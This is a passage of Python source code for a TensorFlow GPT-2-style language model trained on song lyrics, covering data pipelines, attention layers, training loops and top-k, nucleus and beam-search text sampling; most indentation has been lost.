lang1 = [tokenizer.get_vocab_size()] + tokenizer.encode(lang1.numpy()).ids + [tokenizer.get_vocab_size()+1]
lang2 = [tokenizer.get_vocab_size()] + tokenizer.encode(lang2.numpy()).ids + [tokenizer.get_vocab_size()+1]
return lang1, lang2
#
def tf_encode(pt, en):
result_pt, result_en = tf.py_function(encode, [pt, en], [tf.int64, tf.int64])
result_pt.set_shape([None])
result_en.set_shape([None])
#
return result_pt, result_en
#
MAX_LENGTH = 125
#
#
#
def filter_max_length(x, y, max_length=MAX_LENGTH):
return tf.logical_and(tf.size(x) <= max_length,
tf.size(y) <= max_length)
#train_dataset = train_examples.map(tf_encode)
#train_dataset = train_dataset.filter(filter_max_length)
# cache the dataset to memory to get a speedup while reading from it.
train_dataset = train_examples.cache()
# train_dataset = train_dataset.repeat(25)
    train_dataset = train_dataset.shuffle(BUFFER_SIZE).padded_batch(BATCH_SIZE)
train_dataset = train_dataset.prefetch(tf.data.experimental.AUTOTUNE)
#val_dataset = val_examples.map(tf_encode)
val_dataset = val_examples.padded_batch(BATCH_SIZE)
return train_dataset, val_dataset, tokenizer#, tokenizer_pt
def window_based(test_size=.10, shuffle=False, target_vocab_size=2**12):
test_size = 1 - test_size
dataset = list()
_t = Lyrics(32, 1000)
data_dir = 'data/processed/verses_encoded.txt'
with open(data_dir, "r") as fp: # Unpickling
lyrics = fp.read()
tokenizer = BertWordPieceTokenizer()
tokenizer.train(['data/processed/verses_encoded.txt'])
tokenizer.add_tokens(['<START>','<END>','<NEWLINE>'])
arr = [[clean_text(j).replace('newline','<NEWLINE>').replace('start','<START>').replace('end','<END>') for j in i.split(' \n ') if len(j) > 1 and '\n\n' != j] for i in list(np.array(lyrics.split('\n\n'))) if len(i.split(' \n ')) > 0]
# print(arr)
# for verse in arr:
# chunk_number = len(verse) // 5
# if chunk_number > 0:
# chunks = ['<START> ' + ''.join([ j.replace('\n','').replace('\n\n','') + ' <NEWLINE> ' for j in verse[x:x+chunk_number]]) + ' <END>' for x in range(0, len(verse), chunk_number)]
# chunks = [chunk for chunk in chunks if len(chunk.split('<NEWLINE>')) > 2]
# print()
# dataset.append(chunks)
# train = dataset
train = [y for x in arr for y in x]
train = [tokenizer.encode(i).ids for i in train]
train = [y for x in train for y in x]
# train.split('<NEWLINE>')
# print(train)
# train = ' <EOV> '.join(dataset)
# print(train)
# tokenizer.add_tokens(['<START>','<END>','<NEWLINE>','<EOV>'])
# target = _t.target
# target = [x[1] for x in dataset]
# print(len(dataset))
# X_train, X_test, y_train, y_test = train_test_split(example, target, test_size=0.10, shuffle=True)
# train_dataset = tf.data.Dataset.from_tensor_slices((X_train, y_train))
# print(len(dataset))
# np.random.shuffle(dataset)
# train_test = dataset[:round(len(dataset) * test_size)]
# train = train_test[:round(len(train_test) * test_size)]
# test = train_test[round(len(train_test) * test_size):]
# val = dataset[round(len(dataset) * test_size):]
# train_dataset = tf.data.Dataset.from_tensor_slices(train)
# tokenizer = BertWordPieceTokenizer("data/processed/vocab.txt", lowercase=True)
# tokenizer = tfds.features.text.SubwordTextEncoder.build_from_corpus((en.numpy() for en in train_dataset), target_vocab_size=target_vocab_size, reserved_tokens=['<UNK>','<NEWLINE>','<START>','<END>'])
train_dataset = tf.data.Dataset.from_tensor_slices(train)
seq_length = 40
# examples_per_epoch = len(train.split())//(seq_length+1)
# data = [i for i in flattened_list if len(i) < 100]
sequences = train_dataset.batch(seq_length+1, drop_remainder=True)
dataset = sequences.map(split_input_target)
# Batch size
BATCH_SIZE = 128
# Buffer size to shuffle the dataset
# (TF data is designed to work with possibly infinite sequences,
# so it doesn't attempt to shuffle the entire sequence in memory. Instead,
# it maintains a buffer in which it shuffles elements).
BUFFER_SIZE = 20000
dataset = dataset.shuffle(BUFFER_SIZE).batch(BATCH_SIZE)
dataset = dataset.repeat(50)
dataset = dataset.prefetch(tf.data.experimental.AUTOTUNE)
print(dataset)
return dataset, tokenizer
def simple_method(sequence_size, testSetRatio=0.15):
testSetRatio = 1-testSetRatio
data_dir = 'data/processed/verses_test.txt'
with open(data_dir, "rb") as fp: # Unpickling
lyrics = pickle.load(fp)
arr = [' <NEWLINE> '.join([clean_text(j) for j in i.split(' \n ') if len(j) > 1 and '\n\n' != j]) for i in list(np.array(lyrics)) if len(i.split(' \n ')) > 0]
#tokenizer = BertWordPieceTokenizer()
#tokenizer.train(['data/processed/verses_encoded.txt'])
tokenizer = GPT2Tokenizer.from_pretrained('gpt2-xl')
#tokenizer.train(['data/processed/verses_encoded.txt'])
special_tokens_dict = {'eos_token':'<END>','sep_token':'<NEWLINE>','bos_token':'<START>'}
num_added_toks = tokenizer.add_special_tokens(special_tokens_dict)
print(tokenizer.encode(' <NEWLINE> '))
tokenizer.save_pretrained('src/data/tokenizers')
dataset = list()
for verse in arr:
tmp = list()
verse = ' <START> ' + verse + ' <END> '
verse_split = verse.split(' <NEWLINE> ')
for line in verse_split:
tmp = tmp + tokenizer.encode(line + ' <NEWLINE>', add_prefix_space=True)
if tmp:
dataset.append(tmp)
print(dataset[0])
# dataset = [[item for sublist in verse.split(' \n ') for tokenizer.encode(item, add_prefix_space=True) in sublist] for verse in arr]
np.random.shuffle(dataset)
verse_length = [len(verse) for verse in dataset]
verse_average = sum(verse_length) / len(verse_length)
print(f'Average number of words in a verse {verse_average}')
# dataset = dataset[
train = dataset[:round(len(dataset) * testSetRatio)]
test = dataset[round(len(dataset) * testSetRatio):]
print(f'train size {len(train)}')
print(f'test size {len(test)}')
trainTensor = simple_pipeline(train, sequence_size)
testTensor = simple_pipeline(test, sequence_size)
return trainTensor, testTensor, tokenizer
def simple_pipeline(dataset, sequence_size):
dataset = [y for x in dataset for y in x]
assert isinstance(dataset[0], int)
print(f'number of tokens {len(dataset)}: \n{dataset[:5]}')
train = tf.data.Dataset.from_tensor_slices(dataset)
train = train.window(sequence_size, drop_remainder=True)
for window in train.take(5):
print(list(window.as_numpy_iterator()))
train = train.flat_map(lambda window: window.batch(sequence_size))
train = train.shuffle(10000).batch(64)
train = train.map(lambda windows: (windows[:,:-1], windows[:,1:]))
# train = train.cache()
train = train.prefetch(tf.data.experimental.AUTOTUNE)
return train
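# simple_pipeline slides a window of `sequence_size` tokens over the flattened
# token stream and then shifts each batched window by one position to build
# (input, target) pairs, e.g. a window [t0..t11] with sequence_size=12 yields
# inputs [t0..t10] and targets [t1..t11].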
def gelu(x):
with tf.name_scope("gelu"):
        cdf = 0.5 * (1.0 + tf.tanh((np.sqrt(2 / np.pi) * (x + 0.044715 * tf.pow(x, 3)))))
return x * cdf
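# gelu() above is the tanh approximation of the Gaussian Error Linear Unit,
# 0.5 * x * (1 + tanh(sqrt(2/pi) * (x + 0.044715 * x^3))), the activation used
# in GPT-2's feed-forward blocks.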
def shape_as_list_2(x):
return [int(i) for i in tf.shape(x)]
def get_padding_mask(seq):
with tf.name_scope("Padding_Mask"):
seq = tf.cast(tf.math.equal(seq, 0), tf.float32)
# add extra dimensions to add the padding
# to the attention logits.
return seq[:, tf.newaxis, tf.newaxis, :] # (batch_size, 1, 1, seq_len)
def attention_mask(size):
with tf.name_scope("attention_mask"):
mask = 1 - tf.linalg.band_part(tf.ones((size, size)), -1, 0)
return mask # (seq_len, seq_len)
def create_masks(inp):
with tf.name_scope("attn_masking"):
# Encoder padding mask
att_mask = attention_mask(tf.shape(inp)[1])
# Used in the 2nd attention block in the decoder.
# This padding mask is used to mask the encoder outputs.
padding_mask = get_padding_mask(inp)
mask = tf.maximum(padding_mask, att_mask)
return mask
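# Illustrative note (assumed shapes): for `inp` of shape (batch, seq_len),
# create_masks returns a (batch, 1, seq_len, seq_len) tensor that is 1 wherever
# a position is padding or lies in the "future"; those logits later receive
# (mask * -1e9) so the softmax effectively ignores them.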
def scaled_dot_product_attention(q, k, v, training, mask=None):
"""
Calculate the attention weights.
q, k, v must have matching leading dimensions.
k, v must have matching penultimate dimension, i.e.: seq_len_k = seq_len_v.
The mask has different shapes depending on its type(padding or look ahead)
but it must be broadcastable for addition.
Args:
q: query shape == (..., seq_len_q, depth)
k: key shape == (..., seq_len_k, depth)
v: value shape == (..., seq_len_v, depth_v)
mask: Float tensor with shape broadcastable
to (..., seq_len_q, seq_len_k). Defaults to None.
Returns:
output, attention_weights
"""
matmul_qk = tf.matmul(q, k, transpose_b=True) #(..., seq_len, seq_len_k)
# scale matmul_qk
    dk = tf.cast(tf.shape(k)[-1], tf.float32)
    scaled_attention_logits = matmul_qk / tf.math.sqrt(dk)
# add the mask to the scaled tensor
if mask is not None:
scaled_attention_logits += (mask * -1e9)
# softmax is normalized on the last axis (seq_len_k) for scores to add up to 1
attention_weights = tf.nn.softmax(scaled_attention_logits, axis=-1)
output = tf.matmul(attention_weights, v)
return output, attention_weights
def print_out(q, k, v):
temp_out, temp_attn = scaled_dot_product_attention(
q, k, v, None
)
print('Attention weights are:')
print(temp_attn)
print('Output is:')
print(temp_out)
class MultiHeadAttention(tf.keras.layers.Layer):
def __init__(self, d_model, num_heads, att_dropout=0.4,
residual_dropout=0.45, scale=True):
super(MultiHeadAttention, self).__init__()
self.num_heads = num_heads
self.d_model = d_model
self.att_dropout = att_dropout
self.residual_dropout=residual_dropout
self.scale=scale
assert d_model % self.num_heads == 0
self.depth = d_model // self.num_heads
self.c_attn = Conv1d(self.d_model, self.d_model * 3)
self.c_proj = Conv1d(self.d_model, self.d_model)
def multihead_attention(self, q, k, v, training, mask=None):
"""
Calculate the attention weights.
q, k, v must have matching leading dimensions.
k, v must have matching penultimate dimension, i.e.: seq_len_k = seq_len_v.
The mask has different shapes depending on its type(padding or look ahead)
but it must be broadcastable for addition.
Args:
q: query shape == (..., seq_len_q, depth)
k: key shape == (..., seq_len_k, depth)
v: value shape == (..., seq_len_v, depth_v)
mask: Float tensor with shape broadcastable
to (..., seq_len_q, seq_len_k). Defaults to None.
Returns:
output, attention_weights
"""
matmul_qk = tf.matmul(q, k, transpose_b=True) #(..., seq_len, seq_len_k)
# scale matmul_qk
if self.scale:
dk = tf.cast(tf.shape(k)[-1], tf.float32)
matmul_qk = matmul_qk / tf.math.sqrt(dk)
# add the mask to the scaled tensor
if mask is not None:
matmul_qk += (mask * -1e9)
# softmax is normalized on the last axis (seq_len_k) for scores to add up to 1
attention_weights = tf.nn.softmax(matmul_qk, axis=-1)
if training:
attention_weights = tf.nn.dropout(attention_weights, rate=self.att_dropout, name="attn_dropout") # (..., seq_len_q, seq_len_k)
output = tf.matmul(attention_weights, v)
return output, attention_weights
def split_heads(self, x):
"""Split the last dimension into (num_heads, depth).
Transpose the result such that the shape is (batch_size, num_heads, seq_len, depth)
"""
batch_size = tf.shape(x)[0]
x = tf.reshape(x, (batch_size, -1, self.num_heads, self.depth))
return tf.transpose(x, perm=[0, 2, 1, 3])
def merge_heads(self, x):
batch_size = tf.shape(x)[0]
scaled_attention = tf.transpose(x, perm=[0, 2, 1, 3]) # (batch_size, seq_len_q, num_heads, depth)
merged = tf.reshape(scaled_attention,
(batch_size, -1, self.d_model))
return merged
def call(self, x, mask=None, past_layer=None, training=True):
x = self.c_attn(x)
query, key, value = tf.split(x, 3, axis=2)
query = self.split_heads(query) # (batch_size, seq_len, d_model)
key = self.split_heads(key) # (batch_size, seq_len, d_model)
value = self.split_heads(value) # (batch_size, seq_len, d_model)
if past_layer is not None:
past_key, past_value = tf.unstack(past_layer, axis=1)
key = tf.concat([past_key, key], axis=-2)
value = tf.concat([past_value, value], axis=2)
present = tf.stack([key, value], axis=1)
scaled_attention, attention_weights = self.multihead_attention(query, key, value, training, mask)
concat_attention = self.merge_heads(scaled_attention)
output = self.c_proj(concat_attention)
if training:
output = tf.nn.dropout(output, rate=self.residual_dropout, name="resit_dropout")
return output, present
class EmbeddingLayer(tf.keras.layers.Layer):
def __init__(self, vocab_size, embedding_size, initializer=None, stddev=0.01, mean=0.0):
super(EmbeddingLayer, self).__init__()
self.vocab_size = vocab_size
self.embedding_size = embedding_size
self.stddev = stddev
self.mean = mean
self.initializer = initializer
if self.initializer is None:
self.initializer = tf.random_normal_initializer(mean=self.mean, stddev=self.stddev)
def build(self, input_shape):
with tf.name_scope("embedding_weights"):
self.embedding_weights = self.add_weight("weights", shape=[self.vocab_size, self.embedding_size],
dtype="float32",
initializer=self.initializer
)
super(EmbeddingLayer, self).build(input_shape)
def call(self, inputs, mode="embedding", scale=False):
if mode == "embedding":
return self.embedding(inputs, scale=scale)
elif mode == "projection":
return self.projection(inputs)
else:
raise ValueError("mode {} is not valid.".format(mode))
def embedding(self, inputs, scale=False):
with tf.name_scope("embedding"):
# Create binary mask of size [batch_size, length]
mask = tf.cast(tf.not_equal(inputs, 0), tf.float32)
inputs = tf.cast(inputs, tf.int32)
embeddings = tf.nn.embedding_lookup(self.embedding_weights, inputs)
embeddings *= tf.expand_dims(mask, -1)
# Scale embedding by the sqrt of the hidden size
if scale:
embeddings *= self.embedding_size ** 0.5
return embeddings
def projection(self, inputs):
with tf.name_scope("output_layer"):
batch_size = tf.shape(inputs)[0]
seq_len = tf.shape(inputs)[1]
h_flat = tf.reshape(inputs, [-1, self.embedding_size])
logits = tf.matmul(h_flat, self.embedding_weights, transpose_b=True)
return tf.reshape(logits, [batch_size, seq_len, self.vocab_size])
class PositionEmbeddingLayer(tf.keras.layers.Layer):
def __init__(self, position_seq, pos_embedding_size, trainable=True, stddev=0.02, mean=0.0):
super(PositionEmbeddingLayer, self).__init__()
self.position_seq = position_seq
self.hidden_size = pos_embedding_size
self.trainable = trainable
self.stddev = stddev
self.mean = mean
if trainable:
self.position_embedding = EmbeddingLayer(self.position_seq, self.hidden_size,
stddev=self.stddev, mean=self.mean)
def call(self, inputs, start=1):
with tf.name_scope("pos_embedding"):
if self.trainable:
batch_size = tf.shape(inputs)[0]
batch_seq = tf.shape(inputs)[1]
positions = tf.reshape(tf.tile(tf.range(start, batch_seq + start), [batch_size]),
[batch_size, batch_seq])
positions = tf.cast(positions, tf.int32)
position_mask = tf.cast(tf.not_equal(inputs, 0), tf.int32)
positions *= position_mask
return self.position_embedding(positions)
else:
return self.get_position_sinusoid(self.position_seq)
@staticmethod
def get_position_sinusoid(seq_len, hidden_size, min_timescale=1.0, max_timescale=1.0e4):
position = tf.cast(tf.range(seq_len), tf.float32)
num_timescales = hidden_size // 2
log_timescale_increment = (
math.log(float(max_timescale) / float(min_timescale)) /
(tf.cast(num_timescales, tf.float32) - 1))
inv_timescales = min_timescale * tf.exp(
tf.cast(tf.range(num_timescales), tf.float32) * -log_timescale_increment)
scaled_time = tf.expand_dims(position, 1) * tf.expand_dims(inv_timescales, 0)
signal = tf.concat([tf.sin(scaled_time), tf.cos(scaled_time)], axis=1)
return signal
class Conv1d(tf.keras.layers.Layer):
def __init__(self,
hidden_size,
filter_size,
weights_init_stdev=0.02,
weights_mean=0.0,
bias_init=0.0):
super(Conv1d, self).__init__()
self.weights_init_stdev = weights_init_stdev
self.weights_mean = weights_mean
self.bias_init = bias_init
self.hidden_size = hidden_size
self.filter_size = filter_size
def build(self, input_shape):
self.weight = self.add_weight(
"cov1d_weights",
shape=[self.hidden_size, self.filter_size],
dtype=tf.float32,
initializer=tf.random_normal_initializer(
stddev=self.weights_init_stdev,
mean=self.weights_mean))
self.bias = self.add_weight("conv1d_biases",
shape=[self.filter_size],
initializer=tf.constant_initializer(self.bias_init))
super(Conv1d, self).build(input_shape)
def call(self, inputs):
output_shape = [tf.shape(inputs)[0], tf.shape(inputs)[1]] + [self.filter_size]
inputs = tf.reshape(inputs, [-1, self.hidden_size]) # shape [batch, seq , features] => [batch*seq, features]
outputs = tf.matmul(inputs, self.weight) + self.bias
outputs = tf.reshape(outputs, output_shape) # Reshape => [batch, seq, filter_size]
return outputs
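# Conv1d here is effectively a position-wise dense layer (a 1x1 convolution):
# every timestep is multiplied by the same [hidden_size, filter_size] weight
# matrix and offset by a shared bias, mirroring the "conv1d" naming used in the
# original GPT-2 code.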
class FeedForward(tf.keras.layers.Layer):
def __init__(self, hidden_size, filter_size, dropout_rate=0.45, activation=tf.nn.relu):
super(FeedForward, self).__init__()
self.hidden_size = hidden_size
self.filter_size = filter_size
self.activation = activation
self.dropout_rate = dropout_rate
self.dense_layer = Conv1d(self.hidden_size, self.filter_size)
self.output_dense_layer = Conv1d(self.filter_size, self.hidden_size)
def call(self, x, training=False):
output = self.dense_layer(x)
output = self.activation(output)
output = self.output_dense_layer(output)
if training:
output = tf.nn.dropout(output, rate=self.dropout_rate, name="feed_forward_dropout")
return output
class LayerNormalization(tf.keras.layers.Layer):
def __init__(self, hidden_size):
super(LayerNormalization, self).__init__()
self.hidden_size = hidden_size
def build(self, input_shape):
self.gamma = self.add_weight(
"layer_norm_scale",
shape=[self.hidden_size],
dtype="float32",
initializer=tf.ones_initializer(),
experimental_autocast=False)
self.beta = self.add_weight(
"layer_norm_bias",
shape=[self.hidden_size],
dtype="float32",
initializer=tf.zeros_initializer(),
experimental_autocast=False)
super(LayerNormalization, self).build(input_shape)
def call(self, x, epsilon=1e-6, input_dtype=tf.float32):
mean = tf.reduce_mean(x, axis=[-1], keepdims=True)
variance = tf.reduce_mean(tf.square(x - mean), axis=[-1], keepdims=True)
normalized = (x - mean) * tf.math.rsqrt(variance + epsilon)
return tf.cast(normalized * self.gamma + self.beta, input_dtype)
def argmax(logits):
return tf.argmax(logits)
def top_k_logits(logits, k):
if k == 0:
return logits
values, _ = tf.nn.top_k(logits, k=k)
    min_values = values[:, -1, tf.newaxis]
return tf.where(
logits < min_values,
tf.ones_like(logits, dtype=logits.dtype) * -1e10,
logits
)
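# top_k_logits keeps only the k highest logits in each row and pushes the rest
# to -1e10 so they get ~zero probability after softmax; with k=0 it is a no-op.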
# Nucleus Sampling (https://arxiv.org/pdf/1904.09751.pdf)
def top_p_logits(logits, p):
"""Took from OpenAI GPT-2 Implememtation"""
batch = tf.shape(logits)[0]
sorted_logits = tf.sort(logits, direction='DESCENDING', axis=-1)
cumulative_probs = tf.cumsum(tf.nn.softmax(sorted_logits, axis=-1), axis=-1)
indices = tf.stack([
tf.range(0, batch),
tf.maximum(tf.reduce_sum(tf.cast(cumulative_probs <= p, tf.int32), axis=-1) - 1, 0),
], axis=-1)
min_values = tf.gather_nd(sorted_logits, indices)
return tf.where(
logits < min_values,
tf.ones_like(logits) * -1e10,
logits,
)
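# top_p_logits (nucleus sampling) keeps roughly the smallest set of tokens whose
# cumulative probability reaches p (always at least one per row) and masks the
# remaining logits to -1e10.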
train_step_signature = [
tf.TensorSpec(shape=(None, None), dtype=tf.int32, name="Inputs"),
tf.TensorSpec(shape=(None, None), dtype=tf.int32, name="Targets"),
tf.TensorSpec(shape=(None), dtype=tf.int32, name="Step")
]
test_step_signature = [
tf.TensorSpec(shape=(None, None), dtype=tf.int32, name="Inputs"),
tf.TensorSpec(shape=(None, None), dtype=tf.int32, name="Targets"),
tf.TensorSpec(shape=(None), dtype=tf.int32, name="Step")
]
class Gpt2(tf.keras.Model):
def __init__(self, num_layers, d_model, num_heads, dff, max_seq_len, vocab_size, tokenizer,
optimizer="adam", learning_rate=0.005, rev_embedding_projection=True):
super(Gpt2, self).__init__()
self.rev_embedding_projection = rev_embedding_projection
self.num_layers = num_layers
self.num_heads = num_heads
self.dff = dff
self.max_seq_len = max_seq_len
self.vocab_size = vocab_size
self.d_model = d_model
self.tokenizer = tokenizer
self.learning_rate = learning_rate
self.optimizer_t = optimizer
self.dataset = None
self.mirrored_strategy = None
self.embedding = EmbeddingLayer(
self.vocab_size, self.d_model)
self.pos_embedding = PositionEmbeddingLayer(
self.max_seq_len, self.d_model)
self.decoder_layers = [DecoderLayer(self.d_model, self.num_heads, self.dff)
for _ in range(self.num_layers)]
self.layer_norm = LayerNormalization(self.d_model)
if not self.rev_embedding_projection:
self.output_layer = OutputLayer(self.vocab_size)
self.loss_object = tf.keras.losses.SparseCategoricalCrossentropy(
from_logits=True, reduction='none')
self.accuracy_object = tf.keras.metrics.SparseCategoricalAccuracy(
name='accuracy')
self.train_step_signature = [
tf.TensorSpec(shape=(None, None), dtype=tf.int32)]
self.test_step_signature = [
tf.TensorSpec(shape=(None, None), dtype=tf.int32)]
def call(self, x, training=True, past=None):
x = tf.cast(x, tf.int32)
batch, sequence = tf.shape(x)[0], tf.shape(x)[1]
if past is None:
pasts = [None] * self.num_layers
else:
pasts = past
assert len(pasts) == self.num_layers
att_mask = create_masks(x)
past_length = 1 if past is None else tf.shape(past)[-2]
with tf.name_scope("embeddings"):
embedded_x = self.embedding(x)
hidden_states = embedded_x + self.pos_embedding(x, start=past_length)
presents = []
for decoder_layer, past in zip(self.decoder_layers, pasts):
hidden_states, present = decoder_layer(hidden_states, training, att_mask, past=past)
presents.append(present)
hidden_states = self.layer_norm(hidden_states)
if self.rev_embedding_projection:
logits = self.embedding(hidden_states, mode="projection")
else:
logits = self.output_layer(hidden_states)
return logits, presents
@staticmethod
def get_padded_accuracy(labels, logits):
with tf.name_scope("padded_accuracy"):
weights = tf.cast(tf.not_equal(labels, 0), tf.float32)
outputs = tf.cast(tf.argmax(logits, axis=-1), tf.int32)
padded_labels = tf.cast(labels, tf.int32)
nonpad_seq = tf.math.count_nonzero(weights, dtype=tf.dtypes.float32, )
acc = tf.cast(tf.equal(outputs, padded_labels), tf.float32)
accuracy = tf.reduce_sum(tf.cast(acc * weights, tf.float32)) / nonpad_seq
return tf.cast(accuracy, tf.float32)
def create_optimizer(self):
optimizer = self.optimizer_t.lower()
with tf.name_scope("optimizer"):
if optimizer == "adam":
self.optimizer = tf.keras.optimizers.Adam(self.learning_rate, beta_1=0.9, beta_2=0.98,
epsilon=1e-9)
elif optimizer == "adadelta":
self.optimizer = tf.keras.optimizers.Adadelta(self.learning_rate)
elif optimizer == "rms":
self.optimizer = tf.keras.optimizers.RMSprop(self.learning_rate)
else:
self.optimizer = tf.keras.optimizers.SGD(self.learning_rate)
return self.optimizer
def get_loss(self, real, pred):
with tf.name_scope("loss_layer"):
mask = tf.math.logical_not(tf.math.equal(real, 0))
loss_ = self.loss_object(real, pred)
with tf.name_scope("loss_masking"):
mask = tf.cast(mask, dtype=loss_.dtype)
loss_ *= mask
loss_ = tf.reduce_sum(loss_, axis=1)
sequence_avg_loss = loss_ / tf.reduce_sum(mask, axis=1)
return sequence_avg_loss
def create_checkpoint_manager(self, checkpoint_path, max_to_keep=5, load_model=True):
with tf.name_scope('checkpoint_manager'):
ckpt = tf.train.Checkpoint(optimizer=self.optimizer, model=self)
self.ckpt_manager = tf.train.CheckpointManager(ckpt, checkpoint_path, max_to_keep=max_to_keep)
if load_model: # If want to load trained weights
ckpt.restore(self.ckpt_manager.latest_checkpoint)
print('Latest checkpoint restored...............')
else:
print("Initializing model from scratch..........")
def load_model(self, filepath):
ckpt = tf.train.Checkpoint(model=self)
ckpt_manager = tf.train.CheckpointManager(ckpt, filepath, max_to_keep=5)
ckpt.restore(ckpt_manager.latest_checkpoint)
print("Model Restored..........................")
def create_summary_writer(self, summary_path):
train_summary_path = summary_path + "/train"
test_summary_path = summary_path + "/test"
with tf.name_scope('summary'):
self.train_writer = tf.summary.create_file_writer(train_summary_path)
self.test_writer = tf.summary.create_file_writer(test_summary_path)
return self.train_writer, self.test_writer
@tf.function(input_signature=train_step_signature)
def train_step(self, inputs, targets, step, grad_clip=True, clip_value=2.5):
with tf.GradientTape() as tape:
predictions, _ = self(inputs, training=True)
loss = tf.reduce_mean(self.get_loss(targets, predictions))
with tf.name_scope("gradients"):
gradients = tape.gradient(loss, self.trainable_variables)
if grad_clip:
gradients = [(tf.clip_by_value(grad, -clip_value, clip_value))
for grad in gradients]
self.optimizer.apply_gradients(zip(gradients, self.trainable_variables))
accuracy = self.get_padded_accuracy(targets, predictions)
with tf.name_scope("summary_writer"):
with self.train_writer.as_default():
tf.summary.scalar("loss", loss, step=tf.cast(step, tf.int64))
tf.summary.scalar("accuracy", accuracy, step=tf.cast(step, tf.int64))
return loss, accuracy
@tf.function(input_signature=test_step_signature)
def test_step(self, inputs, targets, step, grad_clip=True, clip_value=2.5):
with tf.GradientTape() as tape:
predictions, _ = self(inputs, training=False)
test_loss = tf.reduce_mean(self.get_loss(targets, predictions))
test_accuracy = self.get_padded_accuracy(targets, predictions)
with tf.name_scope("summary_writer"):
with self.test_writer.as_default():
tf.summary.scalar("test_loss", test_loss, step=tf.cast(step, tf.int64))
tf.summary.scalar("test_accuracy", test_accuracy, step=tf.cast(step, tf.int64))
return test_loss, test_accuracy
def fit(self, train_dataset, test_dataset, EPOCHS=50):
for epoch in range(EPOCHS):
tf.summary.trace_on(graph=True, profiler=True)
print('EPOCH :{}'.format(epoch))
if not epoch == 0:
step = epoch * step
test_step = epoch * test_step
tf.summary.trace_on(graph=True, profiler=True)
for (step, (inputs, targets)) in enumerate(train_dataset):
train_loss, train_acc = self.train_step(inputs, targets, step)
if step % 100 == 0:
print('Step {} Train_Loss {:.4f} Train_Accuracy {:.4f}'.format(
step, train_loss, train_acc))
if step == 25:
with self.train_writer.as_default():
tf.summary.trace_export(
name="gpt-2",
step=step,
profiler_outdir='logs/train')
if step % 5000 == 0:
ckpt_save_path = self.ckpt_manager.save()
print('Saving checkpoint for step {} at {}'.format(step,
ckpt_save_path))
# tf.summary.trace_on(graph=True, profiler=True)
for (test_step, (inputs, targets)) in enumerate(test_dataset):
test_loss, test_acc = self.test_step(inputs, targets, test_step)
if not epoch == 0:
test_step = epoch * test_step
if test_step % 100 == 0:
print('Step {} Test_Loss {:.4f} Test_Accuracy {:.4f}'.format(
test_step, test_loss, test_acc))
if test_step == 25:
with self.test_writer.as_default():
tf.summary.trace_export(
name="gpt2_test",
step=test_step,
profiler_outdir='logs/test')
def beam_search(self, predictions, top_k=25):
#start with an empty sequence with zero score
output_sequences = [([], 0)]
#looping through all the predictions
for token_probs in predictions:
new_sequences = []
#append new tokens to old sequences and re-score
for old_seq, old_score in output_sequences:
for char_index in range(len(token_probs)):
new_seq = old_seq + [char_index]
#considering log-likelihood for scoring
new_score = old_score + math.log(token_probs[char_index])
new_sequences.append((new_seq, new_score))
#sort all new sequences in the de-creasing order of their score
output_sequences = sorted(new_sequences, key = lambda val: val[1], reverse = True)
#select top-k based on score
# *Note- best sequence is with the highest score
output_sequences = output_sequences[:top_k]
return output_sequences
def sample_sequence(self,seq_len, context=None,temperature=.96,
top_k=25,
top_p=.95,
nucleus_sampling=True):
# vocab_size=2**15
# model_gen = Gpt2(num_layers=self.num_layers, d_model=self.d_model, num_heads=self.num_heads, dff=self.dff, max_seq_len=self.max_seq_len, vocab_size=self.tokenizer.get_vocab_size(), tokenizer=self.tokenizer, optimizer="adam")
# model_gen.create_optimizer()
# model_gen.create_checkpoint_manager('checkpoint')
bos=self.tokenizer.bos_token_id#.encode('<START>')#.ids[0]
eos=self.tokenizer.eos_token_id#.ids[0]
if context == None:
print("Give some context to model.................")
return
context_str = context
context = tf.expand_dims(([bos] + self.tokenizer.encode(context)), 0)
# context = tf.expand_dims(([bos] + [self.tokenizer.encode(context)]), 0)
prev = context
print(prev)
output = context
past = None
for i in range(seq_len):
#context = tf.expand_dims((self.tokenicontext).ids), 0)
#prev = context
#output = context
past = None
logits, past = self(prev, training=False, past=past)
# print(logits)
#logits = (tf.nn.softmax(logits[-1, -5:, :].numpy(),axis=-1) / tf.cast(1.25, tf.float32)).numpy()
logits = logits[:,-1,:] / tf.cast(temperature, tf.float32)
#predictions = beam_search_decoder(logits, 5)
#np.random.shuffle(predictions)
#print([self.tokenizer.decode(i) for i in predictions])
#predictions = predictions[0][0]
# print(logits)
logits = top_k_logits(logits, k=top_k)
# print(logits)
if nucleus_sampling:
logits = top_p_logits(logits, p=top_p)
samples = tf.random.categorical(logits, num_samples=1, dtype=tf.int32)
if tf.equal(samples, eos):
print("Predicted end of sequence.")
break
# print("shape.........")
# print(tf.shape(output))
# print(tf.shape(samples))
#context_str = context_str + ' ' + self.tokenizer.decode(predictions)
#context = tf.expand_dims(([bos] + self.tokenizer.encode(context_str), 0))
prev = samples
output = tf.concat([output, samples], axis=-1)
# print(tf.shape(output))
# print(output)
# print("--------------------------")
result = tf.squeeze(output, axis=0)
pred = [int(i) for i in result]
generated_seq = self.tokenizer.decode([i for i in pred[1:]])
#generated_seq = generated_seq.replace("|SEP|", "\n")
generated_seq = ' '.join(generated_seq.split())
generated_seq = generated_seq.replace("<NEWLINE>", "\n").replace("<|>","\n").replace("<|NEWLINE|NEWLINE|>","\n").replace("<|NEWLINE|NEWLINE|NEWLINE|>","\n")
return generated_seq
from math import log
from numpy import array
from numpy import argmax
# beam search
def beam_search_decoder(data, k):
sequences = [[list(), 0.0]]
# walk over each step in sequence
for row in data:
all_candidates = list()
# expand each current candidate
for i in range(len(sequences)):
seq, score = sequences[i]
for j in range(len(row)):
candidate = [seq + [j], score - log(row[j])]
all_candidates.append(candidate)
# order all candidates by score
ordered = sorted(all_candidates, key=lambda tup:tup[1])
# select k best
sequences = ordered[:k]
return sequences
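# Illustrative usage (assumed shapes): given `data` as a (steps, vocab) array of
# per-step probabilities, beam_search_decoder(data, 3) returns the 3 sequences
# with the lowest accumulated negative log-likelihood as (sequence, score) pairs.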
class OutputLayer(tf.keras.layers.Layer):
def __init__(self, output_dim, proj_weights=None, kernel_initializer=None):
super(OutputLayer, self).__init__()
self.proj_weights = proj_weights
self.output_dim = output_dim
self.layer_weights = None
self.kernel_initializer = kernel_initializer
def build(self, input_shape):
if self.proj_weights is None:
input_dim = tensor_shape.dimension_value(input_shape[-1])
self.layer_weights = self.add_weight(
'output_layer_weights',
shape=[input_dim, self.output_dim],
initializer=self.kernel_initializer,
trainable=True)
super(OutputLayer, self).build(input_shape)
    def call(self, x):
        batch, sequence, d_model = tf.shape(x)[0], tf.shape(x)[1], tf.shape(x)[-1]
